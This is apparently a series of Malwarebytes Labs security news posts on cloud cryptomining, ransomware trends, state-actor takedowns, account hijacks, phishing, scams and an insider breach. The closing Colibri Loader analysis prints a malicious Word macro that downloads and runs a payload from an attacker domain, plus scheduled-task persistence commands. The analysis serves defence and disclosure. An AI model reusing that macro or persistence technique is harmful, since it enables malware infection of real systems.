IT NEWS

Security researchers at Cado Security, a cybersecurity forensics company, recently discovered the first publicly-known malware targeting Lambda, the serverless computing platform of Amazon Web Services (AWS).

Though Lambda has been around for less than ten years, serverless technology is considered relatively young, according to Matt Muir, one of Cado’s researchers. Because of this, security measures for such a technology is often overlooked.

This lack of oversight has now bore fruit.

The malware in question, dubbed “Denonia,” is a cryptominer, which is software that allows the mining of cryptocurrency on computers and servers. The malware’s name is inspired by the domain the threat actors behind the cryptominer communicate with.

A cryptominer may not be among the ranks of ransomware, worms, and general Trojans. Still, the possibility of them taking advantage of Lambda is already here; a Pandora’s Box that can no longer be sealed.

Denonia, realized

Denonia is a Go-based wrapper that contains a modified version of the popular, open-sourced cryptomining software, XMRig.

Though not inherently malicious, XMRig came into prominence after an increase in cryptojacking was recorded in mid-2017, most of which was attributed to XMRig activity maliciously mining Monero. Since then, it has gained the reputation of being the miner of choice of cryptojackers.

Upload dates of Denonia samples on VirusTotal—one was in February, and an earlier sample in January—suggest attacks may have already been going on for months.

Denonia uses a unique evasion technique around address resolution to hide its command and control (C2) domain and traffic, making it difficult to detect using typical measures while making communicating with other servers easier. We have yet to find the actors behind Denonia as they left behind little forensic clues.

Because of these, Cado researchers think the actors behind such attacks possess advanced cloud-specific knowledge to take on a complex infrastructure. Thankfully, this cryptominer has limited distribution.

It’s unknown how actors deploy Denonia, but the researchers suspect that they likely used stolen or leaked AWS access and secret keys, which has happened before. AWS confirmed that actors didn’t breach Lambda via a vulnerability, saying in a follow-up statement to VentureBeat: “the software described by the researcher does not exploit any weakness in Lambda or any other AWS service.”

“The software relies entirely on fraudulently obtained account credentials,” the statement continues. It also stresses that Denonia shouldn’t be considered malware “because it lacks the ability to gain unauthorized access to any system by itself.”

“What’s more, the researchers even admit that this software does not access Lambda — and that when run outside of Lambda in a standard Linux server environment, the software performed similarly.”

The researchers explained in their post how this is possible: “We suspect this is likely due to Lambda ‘serverless’ environments using Linux under the hood, so the malware believed it was being run in Lambda (after we manually set the required environment variables) despite being run in our sandbox.”

Can organizations protect against Denonia and other Lambda-focused attacks?

Lambda is becoming popular because its cheap to run and easier to maintain. Organizations only have to pay for its runtime, not a full server to run their applications. This is a huge money-saver, allowing organizations to allocate money they saved to other matters that may need more financial support.

When it comes to security, however, serverless environments have some catching up to do.

A good starting point for organizations is to secure root credentials and access keys. This is in accordance with AWS’s shared responsibility model, wherein AWS is responsible for taking care of and securing Lambda, but organizations are responsible for securing their own content and functions (programs or scripts) that run on Lambda.

• Refrain from using root access to perform daily tasks. Instead, use it only to (1) create an AWS IAM (Identity and Access Management) admin user account or (2) carry out access and account management tasks.
• Lock away your root access credentials.
• Use a strong AWS root account password. (We have a podcast about that!)
• Enable multi-factor authentication (MFA) on your AWS root account.
• If you have an access key for your AWS root account, delete it. If you must keep it, change the access key regularly.
• Never share your AWS root credentials or access key with anyone.
• Encrypt your data. AWS has an encryption solution you can use.
• Use TLS 1.2 or later to communicate with your AWS resources.

Amazon has more in-depth IAM, access key, and data protection best practices for further reading and consideration.

Stay safe!

The post Denonia cryptominer is first malware to target AWS Lambda appeared first on Malwarebytes Labs.

The Malwarebytes Threat Intelligence team continuously monitors the threat landscape to stay on top of existing and emerging attacks. In this March 2022 ransomware review, we go over some of the most successful ransomware incidents based on both open source and dark web intelligence.

The March data was consistent with the first two months of the year, and the most active ransomware gangs during this month continued to be LockBit, followed by Conti, with an increase in BlackCat (ALPHV), a suspected rebrand of the DarkSide & BlackMatter ransomware groups.

Ransomware Attacks by Gang

Ransomware Attacks by Country

Ransomware Attacks by Industry

Ransomware Mitigations

Source: IC3.gov

• Implement regular backups of all data to be stored as air-gapped, password-protected copies offline. Ensure these copies are not accessible for modification or deletion from any system where the original data resides.
• Implement network segmentation, such that all machines on your network are not accessible from every other machine.
• Install and regularly update antivirus software on all hosts, and enable real-time detection.
• Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.
• Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.
• Audit user accounts with administrative privileges and configures access controls with the least privilege in mind. Do not give all users administrative privileges.
• Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs for any unusual activity.
• Consider adding an email banner to emails received from outside your organization.
• Disable hyperlinks in received emails.
• Use double authentication when logging into accounts or services.
• Ensure routine auditing is conducted for all accounts.
• Ensure all the identified IOCs are input into the network SIEM for continuous monitoring and alerts.

How Malwarebytes protects against ransomware

Malwarebytes can protect systems against all ransomware variants in several ways.

The Malwarebytes Anti-Malware technology detects malicious files, browser modifications, and system modifications on Windows PCs using a combination of signature-based and signatureless technologies. This layer of protection detects the Ransomware binary itself. Detections can happen in real-time as the binary is run or the infection can be rooted out from an already-compromised machine by conducting a full system scan.

Anti-Ransomware is a signatureless technology in charge of monitoring system activity of processes against a certain subset of data in specific locations on the endpoint. Using patented technology, Anti-Ransomware assesses changes in those data files. If an internal scoring threshold is crossed by a monitored process, it triggers a detection from the Anti-Ransomware component.

For those already infected, Ransomware Rollback can help recover encrypted files within 72 hours of the attack. Rollback creates a local cache on the endpoint to store changes to files on the system. It can use this cache to help revert changes caused by a threat. The Rollback feature is dependent on activity monitoring available in Malwarebytes Endpoint Detection and Response.

The post Ransomware: March 2022 review appeared first on Malwarebytes Labs.

There’s a mistake commonly made in the United States that a law that was passed to help people move their healthcare information to a new doctor or provider was actually passed to originally implement universal, wide-ranging privacy controls on that same type of information. This is the mixup with HIPAA—the Health Insurance Portability and Accountability Act—and while the mixup can be harmless most of the time, it can also show up in misunderstandings of other privacy concepts around the world.

Importantly, the mixup colors how we approach data protection, as a requirement and a set of rules, and privacy, as a right granted to certain sectors of our lives. In the European Union, this split is spelled out more clearly in their laws, but in the US, this split is still muddled—there are data protection laws in the United States that aim to achieve data privacy, and there is an entire realm of privacy law that was developed before our current understanding of data.

Today, on the Lock and Code podcast with host David Ruiz, we speak with Gabriela Zanfir-Fortuna, the vice president for global privacy at Future of Privacy Forum, to finally clear up the air on these related but not interchangeable topics. As Zanfir-Fortuna explained in our conversation, data protection can achieve privacy, but it isn’t the only goal that data protection should care about.

“The challenge with data protection, though, is that it needs to balance all of the rights, and sometimes they’re competing rights. That’s challenging indeed. But it’s important to note that the ultimate purpose of data protection is not to achieve privacy at all costs.”

Gabriela Zanfir-Fortuna, vice president for global privacy at Future of Privacy Forum

Tune in to hear all this and more on this week’s Lock and Code podcast by Malwarebytes Labs. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

The post Why data protection and privacy are not the same, and why that matters: Lock and Code S03E09 appeared first on Malwarebytes Labs.

The US Department of Justice (DoJ) and Microsoft have taken the sting out of two operations believed to be controlled by the Russian Federation’s Main Intelligence Directorate (GRU).

On Wednesday, the DOJ announced that it had disrupted GRU’s control over thousands of internet-connected firewall devices compromised by the Russian Sandworm group.

One day later, Microsoft disclosed information about the steps it took to disrupt cyberattacks it had seen targeting Ukraine. These attacks came from Strontium, another GRU-connected threat actor.

In light of world news, it’s important to note that the Sandworm group has always been known to target Ukrainian companies and government agencies. It has been held responsible for destroying entire Ukrainian networks, triggering blackouts by targeting electrical utilities, and releasing the NotPetya malware.

Shutdown operation

Although the DOJ announcement came just two days ago, the takedown operation actually occured a little earlier, in March 2022. And the story starts before that, with a joint advisory released on 23 February by law enforcement agenices in the UK and the USA, about Cyclops Blink malware targeting network devices manufactured by WatchGuard and ASUS.

Cyclops Blink surfaced as a replacement for VPNFilter malware, which the DOJ disrupted with an operation in 2018. Both Cyclops Blink and VPNFilter are generally attributed to the Sandworm group, which has always been seen as a Russian state-sponsored actor.

On the same day the advisory was released, WatchGuard published a diagnosis and remediation plan, and ASUS released its own guidance. However, despite their advice, a botnet of “thousands of infected network hardware devices” running Cyclops Blink remained.

In March the DOJ set out to fix that by targeting the Command and Control (C2) servers that orchestrated the botnet. The department says it did this by copying and removing Cyclops Blink malware from the C2 devices, and closing the external management ports that the Sandworm group used to access them.

WatchGuard users that need the external management ports can reverse the closure through a device restart, but they are advised to follow this knowledge base article about remote management.

Although this stopped Sandworm from controlling the thousands of compromised WatchGuard and ASUS devices, it did not remove the malware from them.

According to Assistant Attorney General Matthew G. Olsen of the Justice Department’s National Security Division:

This court-authorized removal of malware deployed by the Russian GRU demonstrates the department’s commitment to disrupt nation-state hacking using all of the legal tools at our disposal. By working closely with WatchGuard and other government agencies in this country and the United Kingdom to analyze the malware and to develop detection and remediation tools, we are together showing the strength that public-private partnership brings to our country’s cybersecurity.

Sinkhole

On the same day that the DOJ announced its Cyclops Blink takedown, Microsoft obtained a court order authorizing it to take control of seven internet domains being used by the Strontium group.

The Strontium group, often referred to as Fancy Bear or APT28, is another GRU-connected threat actor known to target Ukrainian institutions, as well as government institutions and think-tanks in the United States and the European Union involved in foreign policy.

After taking control of the domains, Microsoft re-directed them to a sinkhole under its control. A sinkhole is a way of redirecting malicious internet traffic so that it can be captured and analyzed by security professionals. Sinkholes are most often used to seize control of botnets.

Microsoft describes this disruption as part of an ongoing long-term campaign, started in 2016, to take legal and technical action to seize infrastructure used by Strontium. The company has established a legal process that enables it to obtain rapid court decisions for this work. Prior to this week, it says it had taken action through this process 15 times to seize control of more than 100 Strontium controlled domains.

Good riddance

While these attacks are just a small part of the cyber-activity we are seeing in Ukraine, it does help to take out a few of these active major threats.

The FBI is urging people to contact their local field office if they believe they have a compromised device. The agency says it “ontinues to conduct a thorough and methodical investigation into this cyber incident.”

The post Successful operations against Russian Sandworm and Strontium groups targeting Ukraine revealed appeared first on Malwarebytes Labs.

Some of the biggest stars around have seen content placed on their YouTube accounts without permission over the last couple of days. Taylor Swift has around 40 million subscribers. Justin Bieber? 68 million. Harry Styles, a respectable 12 million. You can even add Eminem and Michael Jackson to the list of those taken over.

Big names, and even bigger numbers.

The last time I can remember an all-out targeted attack on social media musicians was way back in 2007 during Ye Olde Myspace days. While the threat for mischief there was big, this new attack far surpassed it in terms of people seeing dubious content.

Using Vevo as a stepping-stone to musician channels

According to The Record, the attack specifically targeted accounts using Vevo. The people behind it didn’t promote malware links, or spam, or phishing. Instead, they opted to post about a bizarre scam involving a security guard.

The scam involved a man claiming to have “2,000 tumours”, sentenced to 2 years in jail for grabbing around $319,000 in donations for his non-existent terminal illness. The group claiming to be behind the compromise demanded he be set free via their Twitter account.

If you’ve ever watched a music video from a major artist, there’s a good chance you’ll have seen the Vevo logo in the bottom right hand corner. This is the Vevo channel, where content is uploaded. As Gizmodo notes, videos are merged with the musician’s separate YouTube channel. Existing YouTube accounts can also be merged to create Official Artist Channels.

Speaking to The Verge, Vevo said “Some videos were directly uploaded to a small number of Vevo artist channels earlier today by an unauthorized source.”

This is what Vevo’s FAQ page has to say on the subject of how uploads work:

Vevo does not provide access directly to artists. If your music videos have been delivered to Vevo, you must work with your existing Content Provider/Label who will have access to perform these updates.

What about your YouTube security?

You may not be a multi-million album seller signed up to Vevo on YouTube, but you still need to lock down your YouTube account. Any compromise can lead to masses of spam or videos leading users off-site to phishing or malware.

Signing into YouTube requires a Google account. As such, good Google security hygiene means good YouTube security hygiene too. We’ve covered many Google-centric security concerns previously, but here’s some things you can do now to lock down your account:

• Create a strong password, and enable two-factor authentication (2FA). Use the Google Auth app for 2FA rather than SMS codes, this will help you avoid the threat of SIM-swap attacks.
• Don’t share sign-in information with others. If someone contacts you promising riches beyond your wildest dreams, they may ask for your login details to set up some sort of “affiliate” or partnership status. This is a bad idea, and you shouldn’t do it.
• Use Google’s security checkup. This informs you at a glance about recent login activity, device sign-ins, Gmail settings, and more. It’s a handy, focused way to make sense of the sometimes overwhelming range of options available.
• Remove sites and apps you don’t need or recognise. As with many social accounts, you’re able to connect to a variety of services. View connected apps here.
• Keep an eye on the comments posted to your videos. There’s a lot of spam out there and it may sully your reputation if followers end up in bad places via your content.

This should be enough to get your account moving to a place where it’s a lot more secure than before. While the chance of you being hit by an attack like the one above targeting very well known accounts is low, people regularly look to hijack regular YouTube accounts. Let’s not make it easy for them!

The post YouTube channels of Taylor Swift, Justin Bieber, Harry Styles, and other musicians compromised appeared first on Malwarebytes Labs.

Ledger is one of the biggest hardware cryptocurrency wallets around and scammers have noticed. Phishing mails are in circulation, hoping to snag Ledger users with a sneaky request for passphrases.

What is a Ledger recovery phrase?

A recovery phrase is an incredibly important combination of words that act as the literal keys to your digital crypto kingdom. The phrase is a human-readable version of a private key—a unique secret that must keep private, because it’s the cornerstone of the cryptography that says you own a crypto-someting rather than somebody else.

The Ledger recovery phrase also acts as a backup for everything in your hardware wallet, to the extent that if Ledger ceased operations, you’d still be able to access your crypto-assets via a compatible wallet service. As it put its:

When starting to use your Ledger hardware wallet, you will receive a random set of 24 words. This is also known as your Recovery Phrase. It’s a key element in using a hardware wallet and it must be kept secure and offline at all times.

As we can see, it’s critical to the wellbeing of your digital cash.

What’s the scam?

Phising emails are being sent that refer to a non-existent breach. The “solution” to this breach is to update the 24 word phrase as soon as possible and set up a new wallet PIN.

The mail reads:

If you’re receiving this e-mail, it’s because you’ve been affected by the breach. To protect your assets, please update your 24-Word Phrase and follow the instructions to set up a new PIN for your wallet.

Sincerely, Support Team

The mail also provides a link to a website called “Ledgerphrase(dot)com”.

Should you visit the website without the userID included in the email, the page won’t resolve. If you follow any of the links directly from the email, you’ll be greeted with a passphrase update page that asks users to enter their 24-word passphrase:

Anyone progressing past this point is playing with fire and likely to lose all of their crypto-assets.

How to foil the phishers

Ledger has confirmed this is a phishing attempt:

It also provides a list of security measures to ward off further attempts.

The most important thing to never, ever give anybody your 24 word passphrase. Only ever enter it on your device, and never hand it over to anyone claiming to need it or to websites requesting you enter it. Whether code converter websites, or apps, YouTube livestream giveaways, or even browser extensions claiming to be official products, the advice is still the same.

No matter which form of digital wallet you use, your recovery phrase is your last line of defence to keep bad people away from your funds.

The post Don’t enter your recovery phrase! Phishers target Ledger crypto-wallet users appeared first on Malwarebytes Labs.

Thanks to the Threat Intelligence team for their help with this article.

Security researchers from Armorblox, a cybersecurity company specializing in email-based threats, have encountered a fake WhatsApp email with the subject “New Incoming Voicemessage.”

The sender is “Whatsapp Notifier,” a spoofed name, and an email address using a legitimate domain belonging to a Russian road safety organization, to sneak through mail filters.

Recipients are encouraged to click a “Play” button and listen to their voicemail. That doesn’t happen, though—clicking “Play” directs recipients to a page where Aromorblox found an obfuscated, malicious JavaScript that redirected users to another page. The second page included an exploit, triggered when users responded to an Allow/Block prompt.

Prompts like this are also used by malvertisers when they want to push ads in front of users.

Ads can include (but are not limited to) scam sites, portals for unwanted browser extensions (PUPs), and even malware. The ads vary depending on a user’s device and location.

When we clicked the “Allow” button during our own testing, we were signed up to receive notifications from bingocaptchapoint.top.

The domain we had agreed to receive notifications from then used its priveleged position to redirect us to a page with a bogus offer.

Ten seconds after subscribing we hit our first ad: A Google Chrome “search contest”. And will you look at that?—we won!

This is one of many WhatsApp voicemail message scams. Another variant, detailed by Scam Detector, tricks Android users into downloading a payload called “Browser 6.5” which signs them up to receive text messages from premium rate phone numbers, for example.

What to do?

If you’re a WhatsApp user, remain vigilant and stay up to date with changes to WhatsApp’s services, so you know how they work. (For example, WhatsApp recently announced six changes to its voice message service.)

Check what you are approving before clicking “Allow” on browser prompts, and use a security tool that can block malicious sites and scripts.

and if you sign up for notifications from a site by accident you can remove it in Google Chrome by following these steps: Open Settings, click Privacy and Security, click Site Settings, click Notifications, scroll to Allowed to send notifications. Click the “three dots” icon next to the site you want to remove and click Remove.

If you believe you have fallen victim to this scam—or any other—at work, report the incident to your IT or security team.

Stay safe!

The post Watch out for fake WhatsApp “New Incoming Voicemessage” emails appeared first on Malwarebytes Labs.

In December last year, the customer information of Cash App users was accessed by a former employee of Block, the company behind the popular mobile payment service app. This was revealed in a very recent filing to the Securities and Exchange Commission (SEC), which shows that the former employee accessed and downloaded “certain reports” containing US customer information.

The filing reads:

“While this employee had regular access to these reports as part of their past job responsibilities, in this instance these reports were accessed without permission after their employment ended.”

Cash App is currently in the process of reaching out to its 8.2 million US users about the breach. That includes current and former Cash App users.

The compromised data contains full names and brokerage portfolio values. The filling explains the latter as “the unique identification number associated with customer’s stock activity on Cash App Investing”.

The document also clarified that compromised data “did not include usernames or passwords, Social Security numbers, date of birth, payment card information, addresses, bank account information, or any other personally identifiable information.” Security code, access code, or Cash App account passwords were also not part of the breached data.

According to an email interview with Vice, a Cash App spokesperson said they have already taken remediating steps, and launched an investigation “with the help of a leading forensics firm”.

We have yet to find out exactly how this former employee could still reach assets they should no longer be able to access after separating from their employer. Sadly, incidents like this happen all the time. Multiple studies have shown that many organizations’ former employees, regardless of the nature of their termination, can still access not just corporate data but also platforms used by their former employers. Such incidents are not only classified as insider threat incidents, but they are also good examples of many companies having improper offboarding practices.

Cash App can only be used in the US and UK. No UK customers were affected by this breach.

The post Cash App breached by a former employee could affect millions appeared first on Malwarebytes Labs.

Unfortunately scammers continue to focus on the invasion of Ukraine to make money. A flurry of bogus domains and scam techniques are spreading their wings. They appear to focus on donation fakeouts but there’s a few other nasty surprises lying in wait too.

The lowest of the low

There are few lower tactics than fake fundraising during times of crisis. It was rife during the earthquake and tsunami of 2011, with bogus Red Cross websites and email addresses set up to part people from their money. Money that could have been life-saving was diverted into the pockets of thieves. So too does history repeat itself during the invasion.

Reports indicate a big run on phishing and scams. According to email security firm Tessian, registrations of domains containing “Ukraine” have increased by 210% compared to last year. Perhaps that’s to be expected—the question is how many are genuine and how many are potential rip-off efforts. Tessian’s stats suggest that three quarters are suspicious:

An average of 315 new Ukraine themed domains have been observed per day since the 24th February. 77% of these domains appear to be suspicious based on early indicators. 

Fake it to make it

The tactics used match those deployed in 2011, and pretty much every other major catastrophe. Liberal use of official organisation logos and design which matches the real deal are all common. Where scams sometimes diverge from real fundraising sites is in requesting payment via cryptocurrency. There’s even some QR codes thrown into the mix.

One example given leans into the pressure angle, providing supposed commentary from a 16 year old. Given the horrendous scenes of devastation, this is bound to spur some folks into donating. Unfortunately it’ll only be lining the pockets of scammers.

There’s also word of sites selling Ukraine-themed products, such as t-shirts and other items. While those items aren’t likely to turn up, this is (potentially) less devastating than the donation sites given how much more people may be willing to send to charities.

This is, of course, all very bad. There are things you can do to lessen the risk from awful scams such as the above.

Tips to avoid donating to scammers

• If you receive a fundraising email out of the blue, don’t respond. Consider that reputable charity organisations won’t fire missives at you unless you’ve agreed to receive them. Instead, check with the organisation’s website directly—without using any links in the email.
• While cryptocurrency is being used for some forms of genuine donation, it’s a bear-pit out there, and this should be a red flag. Cryptocurrency scamming is rampant. As above, make your way to the official site of your chosen service and see what they’re doing in terms of donating.
• A sneaky trick donation scammers use is to ask you to reply to [insert scammer’s address], but also CC the mail of the target charity. This is to make it all look very genuine. They may claim the real address is overwhelmed, so you need to use the backup instead. It’s not a problem for the scammer to include a genuine mail as a CC, because they’re banking on the charity being so overwhelmed they won’t see it anyway. By the time somebody notices, you may have already replied to the faker and sent some money.

These tips should help you steer clear of the worst kind of scammers. Please do everything you can to ensure your donations reach those who need it the most, and leave the phishers with what they deserve: a big stack of nothing.

The post Beware Ukraine-themed fundraising scams appeared first on Malwarebytes Labs.

This blog post was authored by Ankur Saini, with contributions from Hossein Jazi and Jérôme Segura

Colibri Loader is a relatively new piece of malware that first appeared on underground forums in August 2021 and was advertised to “people who have large volumes of traffic and lack of time to work out the material“. As it names suggests, it is meant to deliver and manage payloads onto infected computers.

Our Threat Intelligence Team recently uncovered a new Colibri Loader campaign delivering the Vidar Stealer as final payload. There is already published material about Colibri by CloudSek and independent researchers. Since most of the details about the bot have been covered, we decided to highlight a persistence technique we haven’t seen before.

Campaign attack chain

The attack starts with a malicious Word document deploying Colibri bot that then delivers the Vidar Stealer. The document contacts a remote server at (securetunnel[.]co) to load a remote template named trkal0.dot that contacts a malicious macro. This attack is known as remote template injection.

The macro enables PowerShell to download the final payload (Colibri Loader) as setup.exe:

Private Sub Document_Open()
zgotwed = "C:UsersPublicsetup.ex`e"
n87lcy4 = Replace("new:72Cs19e4ts4D", "s19e4ts", "2")
Set hu9v0dd = GetObject(n87lcy4 & "D5-D70A-438B-8A42-984" & CLng("1.8") & "4B88AFB" & CInt("8.1"))
hu9v0dd.exec "cm" & "d /c powers^hell -w hi Start-BitsTransfer -Sou htt`ps://securetunnel .co/connection/setup.e`xe -Dest " & zgotwed & ";" & zgotwed
End Sub

Abusing PowerShell for Persistence

Colibri leverages PowerShell in a unique way to maintain persistence after a reboot. Depending on the Windows version, Colibri drops its copy in %APPDATA%LocalMicrosoftWindowsApps and names it Get-Variable.exe for Windows 10 and above, while for lower versions it drops it in %DOCUMENTS%/WindowsPowerShell named as dllhost.exe

On Windows 7, it creates a scheduled task using the following command:

• schtasks.exe /create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr “C:UsersadminDocumentsWindowsPowerShelldllhost.exe“

On Windows 10 and above, it creates a scheduled task using the following command:

• schtasks.exe /create /tn COMSurrogate /st 00:00 /du 9999:59 /sc once /ri 1 /f /tr “powershell.exe -windowstyle hidden“

In the first scenario (Win7), we see a task pointing to the path of Colibri Loader. However, in the second we see an odd task to execute PowerShell with a hidden window. This is what we believe is a new persistence technique employed by the malware author.

As mentioned earlier, it drops the file with the name Get-Variable.exe in the WindowsApps directory. It so happens that Get-Variable is a valid PowerShell cmdlet (a cmdlet is a lightweight command used in the Windows PowerShell environment) which is used to retrieve the value of a variable in the current console.

Additionally, WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.

We reproduced this technique using the calculator to show how an adversary can easily achieve persistence combining a scheduled task and any payload (as long as it is called Get-Variable.exe and placed in the proper location):

A search on VirusTotal for the file name Get-Variable.exe indicates that the first malicious file uploaded to the platform happened last August, which matches with the time that Colibri appeared on XSS underground forums. That sample has the same networking features as Colibri which helps us ascertain with more confidence that the technique was debuted by Colibri.

Conclusion

Colibri is still in its infancy but it already offers many features for attackers and slowly seems to be gaining popularity. The persistence technique we outlined in this blog is simple but efficient and does not appear to be known.

Malwarebytes users are protected against this attack thanks to our Anti-Exploit layer:

IOCs

Word Document

666268641a7db3b600a143fff00a063e77066ad72ac659ebc77bb5d1acd5633d

setup.exe (Colibri)

54a790354dbe3ab90f7d8570d6fc7eb80c024af69d1db6d0f825c094293c5d77

install.exe (Vidar)

b92f4b4684951ff2e5abdb1280e6bff80a14b83f25e4f3de39985f188d0f3aad

The post Colibri Loader combines Task Scheduler and PowerShell in clever persistence technique appeared first on Malwarebytes Labs.